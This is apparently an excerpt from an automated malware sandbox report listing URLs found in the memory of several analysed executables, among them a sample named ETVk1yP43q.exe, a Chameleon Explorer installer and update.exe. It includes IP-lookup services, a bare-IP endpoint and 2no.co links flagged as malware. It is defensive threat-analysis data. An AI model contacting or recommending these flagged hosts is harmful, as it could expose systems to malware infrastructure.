http://aia.startssl.com/certs/sca.code2.crt06 | cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.dr | false | | high
http://ip-api.com/json | update.exe, update.exe, 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, update.exe, 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp | false | | high
http://www.chameleon-managers.comc | cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dotbit.me/a/ | update.exe, update.exe, 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, update.exe, 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://iplogger.org/ | ETVk1yP43q.exe, 00000000.00000002.1796862019.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778424639.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797004863.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797114581.0000000004C9A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-rep | ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.chameleon-managers.com/subscription/?action=extend&key= | ChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmp | false | Avira URL Cloud: safe | unknown
http://www.chameleon-managers.coms | cexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.startssl.com/sfsca.crl0f | cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.dr | false | | high
https://api.ipify.org | ETVk1yP43q.exe, 00000000.00000003.1782637071.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755737499.0000000004AB2000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1783160385.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796392614.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.chameleon-managers.com/info/versions/k | ChameleonExplorer.exe, 0000000F.00000003.2004458585.0000000003F71000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.chameleon-managers.comBhttp://www.chameleon-managers.comBhttp://www.chameleon-managers.co | cexplorer.exe, 00000001.00000003.1720546422.0000000002370000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1723437714.0000000003200000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0 | cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.dr | false | | high
https://counter.yadro.ru/hit? | ETVk1yP43q.exe, 00000000.00000002.1796862019.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778424639.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797004863.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797114581.0000000004C9A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.chameleon-managers.com/reg.php?program= | ChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmp | false | Avira URL Cloud: safe | unknown
http://www.chameleon-managers.comQN | cexplorer.exe, 00000001.00000003.1945646507.00000000021C4000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.myexternalip.com/raw | ETVk1yP43q.exe, 00000000.00000003.1756339774.0000000004937000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796035751.0000000004937000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1756018602.0000000004917000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.chameleon-managers.comH | ChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmp | false | Avira URL Cloud: safe | unknown
http://www.chameleon-managers.com3t | cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.chameleon-managers.comsK | cexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://counter-strike.com.ua/ | cexplorer.exe, 00000001.00000003.1720546422.0000000002370000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1723437714.0000000003200000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.chameleon-managers.com/subscription/?action=latest&key= | ChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmp | false | Avira URL Cloud: safe | unknown
https://neosoft-activator.appspot.com/vB | ChameleonExplorer.exe, 00000004.00000002.1831169359.00000000014C7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://bot.whatismyipaddress.com | ETVk1yP43q.exe, 00000000.00000003.1777304241.000000000497D000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1783534951.000000000497D000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755919665.000000000497D000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1756224938.000000000497D000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.palkornel.hu/innosetup%1 | cexplorer.exe, 00000001.00000003.1720546422.0000000002370000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1723437714.0000000003200000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.chameleon-managers.com3_lmPlmP | cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.chameleon-managers.com | cexplorer.tmp, 00000002.00000003.1723437714.0000000003200000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1929110914.0000000006261000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmp | false | Avira URL Cloud: safe | unknown
http://www.chameleon-managers.comS | cexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;z | ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778424639.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797004863.0000000004C59000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://iplogger.org/privacy/ | ETVk1yP43q.exe, 00000000.00000002.1796862019.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778424639.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797004863.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797114581.0000000004C9A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.innosetup.com/ | cexplorer.exe, 00000001.00000003.1721375497.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000000.1721951365.0000000000401000.00000020.00000001.01000000.00000006.sdmp, cexplorer.tmp.1.dr | false | | high
https://2no.co/redirect- | ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797114581.0000000004C9A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.chameleon-managers.com/contacts.php?program= | ChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.thawte.com0 | cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.dr | false | | high
http://www.chameleon-managers.com3Y4=A4=AhXInno | cexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.startssl.com/sca-code2.crl0# | cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.dr | false | | high
http://ocsp.startssl.com07 | cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.dr | false | Avira URL Cloud: safe | unknown
http://www.chameleon-managers.com3j | cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.iplogger.org/favicon.ico | ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://92.63.192.63/index.phpv | update.exe, 00000015.00000003.2482146112.0000000000772000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000002.2483935326.0000000000772000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.chameleon-managers.com3h | cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.org | ETVk1yP43q.exe, 00000000.00000003.1756339774.0000000004937000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796035751.0000000004937000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1756018602.0000000004917000.00000004.00000020.00020000.00000000.sdmp | false |
                                                            high
                                                            http://www.startssl.com/policy0cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drfalse
                                                              high
                                                              http://www.chameleon-managers.com3lcexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://ocsp.startssl.com00cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.chameleon-managers.com/contacts.php?utm_source=program&utm_medium=question&utm_campaign=ChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.chameleon-managers.com3ccexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.chameleon-managers.com3fcexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.chameleon-managers.com3gcexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://2no.co/1dHC37BETVk1yP43q.exe, 00000000.00000003.1782637071.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755737499.0000000004AB2000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1783160385.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796392614.0000000004AB9000.00000004.00000020.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              http://www.chameleon-managers.com3cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.chameleon-managers.com3dcexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.chameleon-managers.com3ecexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.dk-soft.org/cexplorer.exe, 00000001.00000003.1720546422.0000000002370000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1723437714.0000000003200000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                high
                                                                http://92.63.192.63/index.html_update.exe, 00000015.00000003.2482146112.000000000078A000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000002.2483935326.000000000078A000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000003.2470147501.000000000078A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://92.63.192.63/index.htmlbupdate.exe, 00000015.00000002.2483935326.000000000075A000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000003.2482146112.000000000075A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://2no.co:443/1dHC37UsersETVk1yP43q.exe, 00000000.00000003.1777701833.0000000004B84000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778548734.0000000004B85000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796667122.0000000004B85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                http://92.63.192.63/index.phpmswsock.dll.muiupdate.exe, 00000015.00000003.2482146112.0000000000772000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000002.2483935326.0000000000772000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://www.startssl.com/policy0cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drfalse
                                                                  high
                                                                  http://aia.startssl.com/certs/ca.crt0cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drfalse
                                                                    high
                                                                    http://www.chameleon-managers.comSQcexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.chameleon-managers.com/0cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.startssl.com/0Qcexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drfalse
                                                                      high
